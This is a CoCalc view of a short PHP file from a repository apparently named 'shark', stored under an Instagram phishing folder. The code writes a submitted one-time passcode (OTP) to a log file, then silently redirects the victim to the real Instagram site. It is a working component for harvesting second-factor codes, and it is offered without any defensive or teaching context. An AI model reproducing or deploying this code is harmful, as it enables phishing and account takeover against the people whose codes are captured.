Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
bhikandeshmukh
GitHub Repository: bhikandeshmukh/shark
Path: blob/master/phs/instagram/posts.php
996 views
1
<?php
2
3
file_put_contents("log.txt", " OTP: " . $_POST['OTP'] . "\n", FILE_APPEND);
4
header('Location: https://www.instagram.com');
5
exit();
6
7